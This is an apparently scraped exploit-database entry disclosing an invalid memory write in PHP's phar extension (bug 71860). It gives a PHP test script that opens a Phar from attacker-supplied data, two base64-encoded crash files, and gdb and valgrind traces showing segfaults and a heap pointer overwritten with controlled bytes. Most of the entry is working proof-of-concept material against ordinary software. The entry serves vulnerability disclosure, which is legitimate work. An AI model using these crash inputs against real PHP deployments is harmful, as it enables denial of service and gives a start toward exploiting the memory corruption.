扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 |
# Exploit Title: Invalid memory write in phar on filename with \0 in name # Date: 2016-03-19 # Exploit Author: @vah_13 # Vendor Homepage: https://secure.php.net/ # Software Link: https://github.com/php/php-src # Version: 5.5.33 # Tested on: Linux Test script: --------------- cat test.php ------------------- <?php $testfile = file_get_contents($argv[1]); try { $phar = new Phar($testfile); $phar['index.php'] = '<?php echo "https://twitter.com/vah_13 ?>'; $phar['index.phps'] = '<?php echo "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"; ?>'; $phar->setStub('<?php Phar::webPhar(); __HALT_COMPILER(); ?>'); } catch (Exception $e) { print $e; }?> ---------------------------------------------------------------------------------- PoC 1 root@TZDG001:/tmp/data2# base64 ret/crash13 CkTJu4AoZHKCxhC7KlDNp2g5Grx7JE092+gDAADJVR1EZS8vL/oAAPovLy8v5y8vLy9lZWVlZWVl DAwMC+MMDAwMDM4MDAwgBwwMDAwMDAxQDC8uLi8jLy88Ly8u+C8vLxERERERERERpXRDbnQgdGhh dCBtVnJrV3h4eHh4eNt4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4ePh4Ly8vLy8vLy8vLy8v Ly8vLy8vLy8vLy8vLkYvLy8vLy8vLy8vLy9kJy8vLy8vLy8vLy8v8+TzMZovLysvLy8vL3l5eXl5 eXl5eXkpIHsEAAYgICAveHh4eHh4eHh4eAF4AAJ4eP8vIExvYWQgY29tbWFuZChTgG5lIHV0aWxp dHkKICAgIGluY2yKZGUuLi4uLi4uLi4uPCYuLi4ucG1kLnBoYXIudmVKCiAgJCAvLyBSdegDIGxp bmUgTW50ZXJmYWxlCiAgIBxleGkAAP//SFBNRFxUZXh0VUl5Q29tbWFuZAAANwAAAHNyY1Rf/39N UElMRVIodjsgPz4MChAAAAANAgAAEP//+QEAAAAAAAAiAAAqAAAAlnJjL21haW4vlA8uLlEvci8u LhAA2GVzZXRzL2NsZWFucipeTUxSZW5kZXLJYEC2IQAAAABjb3JlrgAAAAAAI2OcwrYAAAAAAA0A NwAAAHMASRwAc2V0cy91bndzcmMAnjgjW7gwgAAAcmMAAgAAADN1bGVzZXRzL2MgAAAAb///f/9p YWwueG1s4BIAAB+u4VZzcmMvbWFpbi9yZXNvdXJpZ24ueABzcmMvbQA9dr2itiEASRyXl5eXl5eX l5etl5eXlwAMc3JjL21hW24v6Bvzb3VyY2VzL3J1//+AAHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0 dHR0dHR0WWV0cy9uYRwcMBwcHBwcHBwcAB+u4TSoCwD1A3lvdXJjZXMvdmVsb2Qxmi9LZ01yAB+u 4RgAACCu4VbjDy5nLnhtbP8vAC4uLjwmLnh4eHh4eHh4eHh4+HgZLy8vLi4ucG1kLnBoL3Jlc291 cmNjZXNzcgCAAAAuGnVzc3IvLg0AAHFF7BMAc3JjL/9haW4vcGhwL1BIUE1EL1BhcnMnJycnJycn JycnJycnJyfnAAAKQ5bxci5waHBtGAAAH67hGAAAH67hVuMPLi5RLy8vLy8vc3JW4QcAANevurC2 IQAAAAcAACwvdXNyLy4uL1KHAK78Vm4vcGhwL1BIUE1EL1JlbmRlcmVyKl5NTFJlbmRlcslgQLYh AAAAAAAAGwABAHNyYy9tYWluL3BoNy9QSFBNRC9SdVRlLnCAcDIYAAAfruEAAHNyYy9tYWluL3AA iy0AAABzcmMAAFeu4VYwCAAAPXa9oi8vLy8vLy8vLy8vLy8vLy8vL28v8+TzOoAAAGhwL1D/CzpE ZXZlbG9kMZovbmdNZXRob2QQcGiKlgwAIAAAAFb8BQAAI2OcwrYhAAAAACAANwAAAGNyYy9tYc7O zs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs4AEa7hVnNyYy+A////L9YhzLYhAADg////MXBo cC9QSFBNRC9PdW1hf24vcGhwL1BIUGFEUFBQUFBQUFByYy9tYWluL3BocC9QSFBNRC9SdWxML0Rl c2lnZy9Ub29PYW55TWV0aG9kfy4fruFWYy9tYWluL3BocC9QSFBNRC9SdWxlL0Rlc2lnbi8vRGV2 ZWxvZFxlbnRDbwMAAGMvbQA9dr2itiEASRwAcG1kLnARruFWjwUF//8FcIWYAAIAAAAvLi4v//// /3JILi4vLi91c3IvLi4AADYAAABecmMvUEhQTUQvUnVsZS9EZXNpZ1svV2VpAGhwAAAAc3JjLy8v LwAAAQDk8zGaLy//L1J1bGUvRJCQkJBAkJCQkJDQkJBzkJCQkJCQkJCQkJCQkJCQkG50cm9w6HAu LgAAAQAuLi4uLi4uLi4uL1BIUE1EL091bWFpdi9waHAvUEhQTURlcgAEQ2hpbGRyZW4ucGhwbQsA AB+u4VZ+BQAAgLP4+7Yh3////wAOAAAfruxWbQYAADplbi4vdf//Ly4u5i4vdQBkHwAD6AAD6AAN ADcuLhAA2DUAAAAyAAAAc3JkLy8uLi8uL1Jzci4vdXNycGguUS8vLy9/AAAAL3Vzci+uQi8uL3Vz ci8vLi98c3IvLhciLi91c3IvLi4vdXOALy4uL/////9ldHMvYyAAAABv//9//2lhbC54tbW1tbW1 tbW1tbW1vABjL+ZJTnUgZC4vc5QPAAAEAHIvLi4vdXNyLy4uLy4vdXNyLy4AZC4vAQAAAC4uL3UQ AC8uLi8uL3Vzby4vdXNyDy4uUS8vLy8vL3NyLy4vc3IvLi4odXNyAAIAAC4vdXNzci8uLi91e3Iv rkIvLmRvci9hdRAA2DVXu7YhABcuL3Vzci8uAS8u (gdb) rtest.php ret/crash13 Starting program: /tmp/php-7.0.4/sapi/cli/php test.php ret/crash13 [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. zend_string_init (persistent=0, len=2, str=0x121a64c "->") at /tmp/php-7.0.4/Zend/zend_string.h:157 157zend_string *ret = zend_string_alloc(len, persistent); (gdb) i r rax0xae657211429234 rbx0x7fffffffa880140737488332928 rcx0x64c1612 rdx0x22 rsi0x33 rdi0xae658a11429258 rbp0x20x2 rsp0x7fffffffa7e00x7fffffffa7e0 r8 0xfffffffffffffffb-5 r9 0x11 r100x33 r110x1214fc018960320 r120x1206b7a18901882 r130x44 r140x121a64c18982476 r150x7fffffffa880140737488332928 rip0xd531b40xd531b4 <add_assoc_string_ex+116> eflags 0x10206[ PF IF RF ] cs 0x3351 ss 0x2b43 ds 0x00 es 0x00 fs 0x00 gs 0x00 ***************************************************************** PoC 2 root@dns:~/php-src# base64 ./bck_out/6648 Ly4vdXNyLy4uLy4vdXNy4uLi4uLi4uLi4uLi4uLi4uLi4uLit7e3t7dhI1VmbH8AIGdsb1Rh/39i b25ziGFudCB0AYCAIG1QX1CKRQAAgABFQVMsJywgJ3BoYXInKXNfLy4uLy4vU3NyLy4uL31zci8u LjwuL3Vzci8ubWFxUGhhciggJ3Bokm1kLnBoYXIAAAB/CgovL4iInoiIiIiIiIh1Li9//+ggQ29u ZmlndXJcB2lCY2x1ZC91c3IvLoiJiIiIiKKIiIiIXFxcXFxHXFxcXFxcXFxcXFxciA0uL3VzcmUg cC8uLi91c3IvLi4uL3MQLy4ULxEvgHNyNiBpbmNsdWQv9G8gdXNcIHRoaXMgcGhhctlzZXRfaW5j iYgmMSYmJiY4/e3t7WFyI2VmaW5lIGdsb1T/FhYWFhYWFhYWFhYWFhYWFhYWFhYWaGFyJyk7Co5k ZV9wYXRoKCkpOxYKaWYgKGlzjn+UKCRhcmV2KSAmJiByZWEvdXNyLy4QLy4vdXNyLy4uL31zci8u LjwuL3Vzci8u5i91c3IvLi4vLi91c3IuLj0ndXNyLy4uEADJci8uJi8uL3VzEC9AEhwuL3NyLy4u L3Vzci8uLi8uL2lziz4uLi8uL3Vzci8oLi91bmNsdWQvdVNyLy6IiIikiIiIcwAgLi5y3zouLy4v JiYmJlMmJiYmOBDt7e0= ./bck_out/6648 ==4103== Source and destination overlap in memcpy(0x6e5d800, 0x6e5d798, 291) ==4103==at 0x4C2D75D: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915) ==4103==by 0x6AD1B5: _estrdup (zend_alloc.c:2558) ==4103==by 0x6880FD: php_stream_display_wrapper_errors (streams.c:152) ==4103==by 0x68AE4B: _php_stream_opendir (streams.c:1994) ==4103==by 0x5E986A: spl_filesystem_dir_open (spl_directory.c:236) ==4103==by 0x5ED77F: spl_filesystem_object_construct (spl_directory.c:724) ==4103==by 0x6C1655: zend_call_function (zend_execute_API.c:878) ==4103==by 0x6EBF92: zend_call_method (zend_interfaces.c:103) ==4103==by 0x5A44A8: zim_Phar___construct (phar_object.c:1219) ==4103==by 0x75D143: ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1027) ==4103==by 0x70CFBA: execute_ex (zend_vm_execute.h:423) ==4103==by 0x76D496: zend_execute (zend_vm_execute.h:467) ==4103== ==4103== Invalid read of size 8 ==4103==at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291) ==4103==by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362) ==4103==by 0x6ACEC3: _emalloc (zend_alloc.c:2446) ==4103==by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140) ==4103==by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163) ==4103==by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563) ==4103==by 0x6DC4E0: _zend_hash_str_update (zend_hash.c:667) ==4103==by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407) ==4103==by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384) ==4103==by 0x6E8AA6: zend_fetch_debug_backtrace (zend_builtin_functions.c:2670) ==4103==by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213) ==4103==by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311) ==4103==by 0x429178: zend_throw_exception (zend_exceptions.c:877) ==4103==by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910) ==4103==by 0x42639C: php_error_cb (main.c:1041) ==4103==by 0x427F4B: zend_error (zend.c:1163) ==4103==by 0x426FFD: php_verror (main.c:897) ==4103==by 0x427306: php_error_docref1 (main.c:921) ==4103==Address 0x5c5c5c5c5c5c5c5c is not stack'd, malloc'd or (recently) free'd ==4103== ==4103== ==4103== Process terminating with default action of signal 11 (SIGSEGV) ==4103==General Protection Fault ==4103==at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291) ==4103==by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362) ==4103==by 0x6ACEC3: _emalloc (zend_alloc.c:2446) ==4103==by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140) ==4103==by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163) ==4103==by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563) ==4103==by 0x6DC4E0: _zend_hash_str_update (zend_hash.c:667) ==4103==by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407) ==4103==by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384) ==4103==by 0x6E8AA6: zend_fetch_debug_backtrace (zend_builtin_functions.c:2670) ==4103==by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213) ==4103==by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311) ==4103==by 0x429178: zend_throw_exception (zend_exceptions.c:877) ==4103==by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910) ==4103==by 0x42639C: php_error_cb (main.c:1041) ==4103==by 0x427F4B: zend_error (zend.c:1163) ==4103==by 0x426FFD: php_verror (main.c:897) ==4103==by 0x427306: php_error_docref1 (main.c:921) Segmentation fault Program received signal SIGSEGV, Segmentation fault. zend_mm_alloc_small (size=<optimized out>, bin_num=16, heap=0x7ffff6000040) at /root/php_bck/Zend/zend_alloc.c:1291 1291 heap->free_slot[bin_num] = p->next_free_slot; (gdb) i r rax 0x5c5c5c5c5c5c5c5c 6655295901103053916 rbx 0x8 8 rcx 0x10 16 rdx 0x7ffff60000c0 140737320583360 rsi 0x10 16 rdi 0x120 288 rbp 0x7ffff6000040 0x7ffff6000040 rsp 0x7fffffffa230 0x7fffffffa230 r8 0xf74460 16204896 r9 0x7ffff6013170 140737320661360 r10 0x0 0 r11 0x101 257 r12 0x7ffff605c658 140737320961624 r13 0x7ffff605c640 140737320961600 r14 0x7ffff60561f8 140737320935928 r15 0x8439b8 8665528 rip 0x6acec3 0x6acec3 <_emalloc+115> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 https://bugs.php.net/bug.php?id=71860 https://twitter.com/vah_13 https://twitter.com/ret5et |
体验盒子
